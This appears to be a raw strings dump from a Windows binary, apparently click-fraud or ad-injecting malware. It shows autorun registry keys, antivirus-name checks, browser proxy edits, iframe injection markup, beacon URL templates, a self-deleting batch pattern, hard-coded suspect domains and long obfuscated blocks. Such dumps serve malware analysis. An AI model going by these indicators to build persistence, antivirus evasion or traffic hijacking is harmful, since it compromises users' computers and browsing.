e|YXkf://Sac.Oa_X6c-WEhQgZUf.Qcc/?XP=Tdodj&Ul=xcf|YXkf://UTaX-ce_Hh-dNfUcV.Ub_/?kc=biZYq&XS=iusc|GhYYi|IJKY|ce_Hh|bEYUSRkWbb|USX8Q WRMJhU|RQbMeV 9WaM|RniChiOlQ|ThlU fheSH|ALLMBO aUQHhMUi|CJUKeeR 9gjG|aQcViWQ dZMO|4FMEQ HZcHUZGj|0JYP qOZhAgYAf|vcj_ zbblVOK8VX|kOnY pHfVWiOFUZ|xjhE 4jNaMa|0egW JZSDD|hVXJCcdWLT|pSlAW_G|IX_Ejb|tVYQXiO|z_RSLFCe|nOUVRXVV|2ieLJJOO|6R8jiAhQ|zTUhcfZM|xGTMKSB|MYODXVS|J6IHRWo|JEWdRV|aQn_Z|ObjJG6NZITTVcW|Dda_eHc_OQ|XR8jeRcX|QRUQhhROH|2AQTIFr|QFWeW|SU6QHZ|OhQAcoA|VXUijS|O_bFJJ8-L|EMUVSH|DdEXh6SPR|Ojh6RjSZ|MgTfkWP|RSL4CXX|BSnQQH|RWSTKQ|HZOZPJT|QTVcQn|ShUaVOWAL|IZBMcTH|DoKWiPNU|HOZhNYb|BcMmZe|PhgfBU|48NISHii|FDbEe|T6QHT fn|RAaUBlQm|TWZSlR|DLHPW|GMBlYQHn|GceINK|IZkfLgUS|X_bS_iWf|TPU6E|KbNCVaWD|TbkePJJ|JOjc8gYNZ|PUbkOfcdF|G6NIOPUZ|THVeKWd|9JZdea_|9YVLoOQd|VWbjRO|GAMcEO IXi|GXhMUVB|JMLStcN|UVFZidh oe|S_RWLD|CTHFQlnO|HiXiR8J|LaWoh6|VULYQcV|XS_PhB|ID8ObM|GfdPDn|JceTNU|MSkSKc|WLoOdfZOUT|XMX4MaVPM|aaXFeZSd8J|OdgnXJ|XnZVMg|ZdWgfVY|LEMLMVN|ccGHhEc|ZJIVIWj|XOdgDcX hkTZWbXVDD|IMJMFr|aDPZW_b|HFZOk|hTRQfUcZ|aVoOcfe|MLHGaSS|MciKRSMV|bKUYKfocN|adTlQa|bfiSVhB|OMTWa|NFfaDUZP|dVPFNRWl|aAkQCic|bVoWgXb|NL4PWRBTZ|bLFhSqZ9J|TOaedNUhS|g_RZU|_bhhJQ|FCOKSBg|cHXhSejES|UKkeiI|cYZicQb|ebZjREHP|LWVWBmS|RPdMUVB|TdYbnPHUc|PVYUbfe|cPhBIGL|XEYJf|eD_ZP Uh|LJYOOZhEc|eLVgYn|gbagjFO|HPIREJh|eUHcEiZJ|UYOZkgAS|eRcZSZgSa|dhP-E2LaLJOZ|eURfIUZ6|UYUfZPN|egOn_cZo|clfZELMK|ZINFldQ|UVUlZL|WOKhiPPgUX|lUhfWeRPb|SR38eMO|TZgRTkIc|iESLWhXb|OYcGoXQZi|fgfRUW6PI|WUSibHFjSc|iQReIWj|gUbbEncUb|jlahYSRAB|aENJ_aX|WVKiVPTS|ZSmiEc|iHicQp_aS|heGU2LQP|UPjQPDn|XiZ8TY|aOhhNUm|VZQiZVf|iThNRP|TQFSBgnFLd|ZfbIFd Ie|rcHiQRZZ|lVcZPijSLF QZ|aFOcSDO|pEeRBQLc|mXbPQS|ZZXcei_|mTiURJCaMD|_ZiLD|pMST|VN_Neka6m|oOX_g|pfTePd|_RNGZEY|_seUHnE|hkESHVee_ DnTRiOXbfeWSV|JVGRZIUJhdLQ|hETVLWHebhT OdTIoY|eZfUZXjBbGLM LZEldFKbSiZ9J|UOTaSEeYNZ|MaSWaRPpPO6|JMZPOigJHiXiVH GW|KgdXJnaEmegRVWb_ SQ|I6VWJFOVTLQV|TjVQIVVVaSNYcE|lMbZgeW_|TMREGXVBNccH|GZWlbBNYG_|ahKgYCiiYS|VbaTfFbAJ|aVJIZmaSYIeZ9cS|SSoPHQbIhQ|SReRSgRSW2L|PbESimabZRW|RITdOQe_HYc AhP SbSih_RODLC|QVCFmQUWRR Zo9WVIVhcNdiHcMoZVS|achFW9G_XFSicH Ef|XiZIJ_NblfEb QNY djbXO_TjIRP8gSMF|XaDUZXZhKReIWj|QQheIl_cV|WeUcjBPALM XBSngDWV, GSWBJPTS|rTNQeAgUa|lWeOdRNLD|AMPFDimLE|TMkRHTWXOi WUTgOWcdc_RS|hREDD8NMM|UVTDORJ_b|8NWXbb_KmQCcZ|TVjZbfRUD5GVI|DMibLSYIeV|8QVTW_XJU|SHf_gjZOZXUPQ6|JIQJWoTLQV|c_UK_aJWjT|8QgVZPYbfZ|RibP_6RQRF|NchRShSjjKQ|KGaXnKa|eRZPcZjbaT|UJY2JXVPFr|THVeKWiPWLR|SpWEcnL ZdihSRWcb|UU2XWHPOZ|VOXTSeRVTSK|iX_OQgTVZ|kRcfOfjBQ|9WLVPDbaRUeXZZ6dPJS|ZTBQTRiiYb|mSa_RGDPGVI|WFhaDIRa_dA|FTOgnXLinLcZU|iWZSVZMLFC|MWUSVTLRb|VSbKbPLSjT|LYgOrUSRd|ZShhPbGJM|QFUldQLUEqeHJ|_G_oiHdhIh|_VbfkORZO|bANZETJYdQH|cIkWKWTOa Yd|CaYPckYUW|UZmSVUABM(KMJWUQFbEdZ9J)|TKgbcNbYN|nQgRqbfXd|MRK8ZXBO|bnGUeGZbKWVZVePVYTE|mfbRkeWdjBQ|DMXISBgYGH|fVffNFUUZk_|EcTOgQiYSQWb|ZTRKMZFJEZ TLQZXiRPJ|JKcdPHUmIh|eUhTWaPWJQ6|DbVPTZbLGV|PWlKKSUkXREc|kAlPUdSTW_|VTFARIPPQlQP|DjSil6X_Ggeb|HYiHcfb|cWgbdhPOGJ|JIOBtUSUZP|ScHTKOcebA|hYLYQcRXWZ RZUU2RM|JMVpd_DcMeV|PMPUeeS6oYNZ|SaZgWmXUF|P6RNSSNcc|ORlEjj6YPT|_alEaUTcZU YpRecTIOGPQHF, FmbROeP Zo9WVIVhcNYTE|aXnSleWSV(HOA9MRDMVbLGV)|LpUNTJNZkfKiXIVkYUW|cePpPVAL|UIMPrYFDc|MTkLWVLSj|b6aYDciYT SQWS|XBE2NMRUJh|UVRcIgh6dVRS|gTPdSOhMoecS|gPcP_ADMR|BNfdGLfMeV|8JMJWjXN|bUTb_miSZSb|dPULPQTUZfYQH|TLceNdVcOvcJU|eAl_mVkWaT|fBUGVMXJOZ|SaShSZVLYHJWjT|8adPcPdXiSZ|aVGHF8UMD BXYG|UVTSXHNUORa|RKcZUaMiVV SfhhPJ6L_ YTQ|ibHShEqeHJ|HSceREaaIh|agegOahYFOALM|JJOVhWHhMVV|BNUGfpTNYTE|jMcjfcePpPO6|NPIOBtdSahMVZJJ|TOepPVQeIhQ|gegWaXhPO6|KMXIPngH_RXW|hEXWKeeSKcU|MZeXeUOeQRNRD|ObIUJVeLQV|HfnAUPT|_kbPUaUeMhj|SgbaeYHLGVI|JWZgPHTX_d|PJ_XOZm8aYNZ|MbRegOSZOH|LFfVPYccH|RiIcj6RPaWn|R6gRAgMoVgWaT|XBWADTSYBXYQ|FYPfhLWVSOvXJU|YMcagRdWaT|jPSAPIQBUZ|VHQeJ_SNF_K|iX_6SnCf_kZi|cSbZDLDJQR W|NZRHQUEqeHJ|ZOZ_TJQVIf OYjiOgT|iJO5CVEGJf SLWhEkV|9TddQuRHYcE|VXRkkSecb (TDD9bXBNia)|GLTPfWASHI fkSEjb|BoagegWbb|eSOAQaEU|UcoDQZH_dA|WHTWpX9YcE|nQWRjSecU|MLKGVSQSca|KFjc|WpAYPSWYT|7YdSiagecbZ|WoEUGAPPPSiiKLRc_UA|FfOgdfKbnCcZ|hZdiOgjBWAL|WREBhhHWhSe|R8cJRbrXN|daAhkQf_aS|
facebook.
__fastcall
Fast decoding Code from Chris Anderson
February
file error
FindClose
FindFirstFileA
FindFirstFileExA
FindNextFileA
FindResourceA
flickr
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
" frameborder="no" scrolling="auto" style="margin:0 0 0 0; padding:0 0 0 0;" height="100%" width="100%" ></iframe>
freeaddrinfo
FreeEnvironmentStringsW
FreeLibrary
Friday
ftg65 hji2;3_sscxo4562235df[a,gdd9sf
\gb_%d.bat
<gcQXU><![mpb0r[jgg]]></jeFLU>
/gen_204
Genuu8
GetACP
GetActiveWindow
getaddrinfo
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDiskFreeSpaceExA
GetEnvironmentStringsW
GetEnvironmentVariableA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileType
GetLastActivePopup
GetLastError
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDefaultLangID
GetSystemDirectoryA
GetSystemTime
GetSystemTimeAsFileTime
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserObjectInformationW
GetVersionExA
GetVolumeInformationA
<gf8YPSSkiP><![12jNv[rw]]></gcQhZNHGSa>
.ggpht.
Gh9Ghr
gKZEtzy
GlobalFree
.google
google.
google_ad.line1
google_ad.title
google_ad.url
google-analytics.
google.com
googlesyndication.
googleusercontent.
gstatic.
<gUF><![6yzJ1[Vghf://NH88NPPWZg.FRc/?U=%j]]></hAK>
`h````
H*0"ZOW
H8;H0v
\$H9\$$t
</HEAD>
<HEAD>
header crc mismatch
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSetInformation
HeapSize
<HFTXg><![op061[dQQS]]></JSoRN>
`h`hhh
HH:mm:ss
HHtXHHt
HHtYHHt
Host: %s
</HTML>
<HTML>
http://
HTTP/1.0
HTTP/1.0 200 OK
HTTP/1.1 200 OK
HTTP/1.1 302 Found
http=127.0.0.1:
 HTTP/1.x
http%3A%2F%2F
http://antimouseclub.com
http://bignotebookshop.com
http://crazyleafdesign.com/blog/images/share/facebook.png
http://crazyleafdesign.com/blog/images/share/stumble.png
http://%d.ctrl.%s
http://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg
http://freeharddrivesoft.com
http://freemobilesoftonline.com
http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1
http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2
http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup250.gif
http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif
http://happyaladdin.com
http://healthylifenow.com/templates/7348/images/header_logo.jpg
http://healthylifenow.com/templates/7349/images/header_logo.jpg
http://hollandandbarrett.com/images/footer/account.gif
http://hollandandbarrett.com/images/footer/account.jpg
http://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif
http://japanesegreenteaonline.com/assets/images/greentea-cha-2.gif
http://lostpropaganda.net/blog/pics/3321.jpg
http://lostpropaganda.net/blog/pics/3322.jpg
http://monochrom.at/polytheism/pictures/TanzenderShiva.jpg
http://nationsautoelectric.com/images/50-217-1_F_1_.jpg
http://nationsautoelectric.com/images/50-217-1_F_2_.jpg
http://onlinebizdirectory.com/images/PowerHideBanner.gif
http://onlinebizdirectory.com/images/PowerShowBanner.gif
http://onlinedatingsecretfriends.com/images/im133.jpg
http://onlinedatingsecretfriends.com/images/im134.jpg
http://onlineinstitute.com/g7/images/logo2.jpg
http://onlineinstitute.com/g7/images/logo3.jpg
http://onlineinstitute.com/g7/images/logo4.jpg
http://onlineinstitute.com/g7/images/logo.jpg
http://ordersmallcd.com
http://pdasoftstorage.com
http://psfk.com/img/icons/facebook.png
http://psfk.com/img/icons/twitter.png
http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif
https://
http://searchinpeoplelist.com
HTTP server
http://smallcatsanddog.com
http://supportminidevices.com
http://www.google.com
http://www.google.com/
http://www.yahoo.com/
http://zonetf.com/index.html
hwid=%s&id=%s
h|YXkf://Sac.SbiaEUhDiNjdeWSg.TPP/?F8aW=w34lypThEZ_c1P5y9F7rudvjC3rj9_kXnh|PXUQ://qlZ.dyZ_hCNUYSt.RKb/?cAnd=BJ1j91TezAbfyKsoBLgmya0Q0sjjHYf|XiTj://hlm.VORSZFV2LLHBSfYQJi.Gfc/?JF_Y=9PySB2Cy8Yup8X6qvMjY2NkVG1gZBN1kro|OZgl://kSl.TOgjlZXSf_kU.FGK/?VEUT=GImZCqUusNkd8f6UAZrs6Z0l9zsmvMbS3n|IUne://ZZm.egROXMUeX_HhYTZd.Sed/?aOhi=w5bU3qDeHYgaBN9pqOye8fyQB1dq6Z0l9x|jZSJAL_|WMVnh|KHdXSZ|LTYT|fal|OSXOiXWZiZ|gTVO V6V|PESEXdUH|RRSb|PN_Y|Oog|6TjLn|MbRkShf|ROLEC _IY|CVRHV|SHjc|7QVbXkQ|8jbSb_i|SfbPg|WFWAQP|JJTnYQJ|XEp fKWU|RSoQEQc|MVdikiPOh|iIHE8TI|TP_iFRhI|Xk8P|OUg cXNa|XOn Ndo|
id=%s&c=%d
id=%s&hwid=%s
id=%s&hwid=%s&c=%d&ver=71
id=%s&hwid=%s&step=1&wd=%d&av=%s
id=%s&type=%d&ppcid=%s
?If90t
if exist "%s" goto a
<iframe
</iframe
<iframe src="
IiGM>nw
/images
/imglanding
incompatible version
incorrect data check
incorrect header check
incorrect length check
ineIu(
 inflate 1.2.5 Copyright 1995-2010 Mark Adler 
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
INST_IE
insufficient memory
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
\Internet Explorer
InternetQueryOptionA
InternetSetOptionA
invalid bit length repeat
invalid block type
invalid code lengths set
invalid code -- missing end-of-block
invalid distance code
invalid distances set
invalid distance too far back
invalid literal/length code
invalid literal/lengths set
invalid stored block lengths
invalid string position
invalid window size
<IOR><![81fIz[i.u]]></NYU>
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
.ivwbox.
January
-java-
javascript
jdX9D$4v
<jhc><![z0yJk[%V]]></MPT>
j@j ^V
kasper
Keep-Alive
KERNEL32.DLL
       [-k] keep attributes (don't turn off archive)
&lang=
_LAST_TIME_FAIL_CONNECT_MAIN_SERVER
l!;b	F
LCMapStringW
LeaveCriticalSection
list<T> too long
[-&LMb#{'
LoadLibraryA
LoadLibraryW
LoadResource
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
Location
Location: %s
LockResource
LSSRCHE
LSSRCHTP1
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
lstrlenW
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
mapq.st
.mapquestapi.
MapViewOfFile
mcafee
McAfee*
mcagent.exe
MessageBoxW
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
.microsoft.
\Microsoft
mj>zjZ
MM/dd/yy
Monday
Mozilla
msdownload
msn.com
MultiByteToWideChar
N09F0u
need dictionary
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
 new[]
norton
Norton*
November
_NTDRIVE
ntelu0
_NTROOT
(null)
octet-stream
October
Oh;O\sQ
O@;H s
O@;H(s
ole32.dll
OLEAUT32.dll
`omni callsig'
OpenEventA
OpenMutexA
.opera.
operaprefs.ini
operator
       [-o place-root-subdir] alternate project subdirectory
OZw3(?
PARAM_PROXY_PORT_NUMBER
__pascal
PathIsDirectoryA
PING_LS_TM
`placement delete closure'
`placement delete[] closure'
POST http://%s%s HTTP/1.1
POST %s HTTP/1.1
PPC_CLICK
       [-p place-file]
PPPPPPPP
Pragma: no-cache
prefetch
prefs.js
Process32First
Process32Next
%PROGRAMFILES%
%PROGRAMFILES(X86)%
[Proxy]
Proxy-Connection
PRX_PRM
__ptr64
PulseEvent
PVVVVVV
PWhD`C
Qkkbal
QQSVW3
QQSVWd
       [-q] suppress writing to log file %BINPLACE_LOG%
?query=
&query=
QueryDosDeviceA
QueryPerformanceCounter
&quot;
r8;r0v^
RaiseException
RASAPI32.dll
RasEnumConnectionsA
<RbBVK><![jun3k[w]]></SODiW>
            rc=application error return code,
`.rdata
ReadFile
realaudio
referer
Referer
&referer=%s
.referrer
RegCloseKey
RegDeleteValueA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
__restrict
ResumeThread
<Rka6Yc><![l7vI0[ehZ_]]></UPP2GV>
r.msn.com
       [-r place-root]
RSj0h`sC
RSPhhaC
RSSSSSSh8sC
RtlUnwind
%s_0%d_%d
%s_0_%d_%s
%s_1_%d_%s
%s_1_%s
%s_2_%d_%s
%s_2_%s
%s_3_%d_%s
%s_3_%s
%s:443/?ver=71&id=%s&hwid=%s&search=%s
%s_4_%d_%s
%s_5_%s
Saturday
`scalar deleting destructor'
scorecardresearch.com
script
<script
</script
%s_%d_%d
%s_%d_%d_%d
%s_%d_%d_%d_%d
%s_%d_%s
search.aol.
searcht2.aol.
search.yahoo.com/search
SELECT_RESERV_SRV_%d
SEL_SERV
SEND_INSTALL_REPORT
SEND_INSTALL_REPORT_TM
September
ServiceName
SetEnvironmentVariableA
SetEvent
SetFileAttributesA
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
SetThreadPriority
SetUnhandledExceptionFilter
SHELL32.dll
SHGetFolderPathA
SHGetSpecialFolderPathA
;Sh`jC
SHLWAPI.dll
SizeofResource
Software\Microsoft\Internet Explorer
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows Defender
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards
%s: %s
%s%s_1
%s|%s|%d
%s_%s_%d
%s %s %s
%s_%s_%s
%s(%s, %s);
^SSSSS
%s start%s%c%s
%s/%s?v%d=%d&tq=%s
       [-s Symbol file path] split symbols from image files
start=
start=0
__stdcall
stor.cfg
%s?tq=%s
stream end
stream error
`string'
string too long
StrStrA
StrStrIA
StrStrNW
suche.aol.
Sunday
%s up%s
%s?v%d=%d&tq=%s
SVWj8h
Symantec*
SystemFunction036
SystemTimeToFileTime
.tacoda.
TerminateProcess
text/html
<TgTDN_Y><![z9yyz[q_]]></jaSY_gf>
.thawte.
+t HHt
__thiscall
!This program cannot be run in DOS mode.
t>h@uC
Thursday
t<h@YC
TIME_SWITCH
t=ip&hrs=%d&q=&s=1
tISh rC
</TITLE>
<TITLE>
TITLE_CLICK
< tK<	tG
.tlowdb.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
too many length or distance symbols
tR99u2
Transfer-Encoding
Transfer-Encoding: 
t*=RCC
.truveo.
TryEnterCriticalSection
t=%s&hrs=%d&q=&s=%d
t=%s&hrs=%d&q=%s&s=%d
t"SS9] u
t=st&q=%s
<+t"<-t
       [-t] test mode
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
;t$$t	V
t$<"u	3
Tuesday
;t$,v-
twitter.
&type=%d
 Type Descriptor'
`typeof'
type=%s&system=%s&id=%s&status=%s
u59\$$t/9
u&9\$du
u/9\$Tu
`udt returning'
uGSWWj
uISPSj
__unaligned
uncheck
=='undefined'?'%s':'%s'
UnhandledExceptionFilter
unknown
Unknown
unknown compression method
Unknown exception
unknown header flags set
UnmapViewOfFile
uNSSSSj
UQPXY]Y[
URPQQh
usage: binplace [switches] image-names... 
Use HTTP
USER32.dll
User-Agent
User-Agent: mozilla/2.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
&useragent=%s
user_pref
uTVWh?
%u.%u.%u.%u
<UVWlbP>
u~WSWj
u;WVVVV
`vbase destructor'
`vbtable'
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
vector<T> too long
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
Version
<VFGgUWKeH><![33f7q[h]]></eaUIUiHiP>
`vftable'
</VFToaW>
`virtual displacement map'
.virtualearth.
v	N+D$
       [-v] verbose output
VWhP_C
VWWWWh
V_:X1:
W9\$@t?
WaitForSingleObject
Wednesday
where: [-?] display this message
WideCharToMultiByte
wikimedia.
wikipedia.
\Windows NT
WinHttpCloseHandle
WinHttpConnect
WINHTTP.dll
WinHttpOpen
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WinHttpSendRequest
WININET.dll
_Wjd_W
wkPSQR
w+OQvr
WriteConsoleW
WriteFile
WS2_32.dll
WSASocketA
.wsod.
wsprintfA
WVVVh,`C
www.www.ru
WWWWWWV
\x26#39;
\x26amp;
\x26gt;
\x26lt;
\x26quot;
\$X9\$0t'
<xframe
</xframe
<xpplet
</xpplet
xppwpp
xpxxxx
yahoo.
yahoo.com
.yimg.com
youtube.
.ypcdn.
<YPZZa><![0izIj[JcUc_h_ CWGHJ mWV qPiTFDj %H%V .]]></jEYSK>
ytimg.
)\ZEo^m/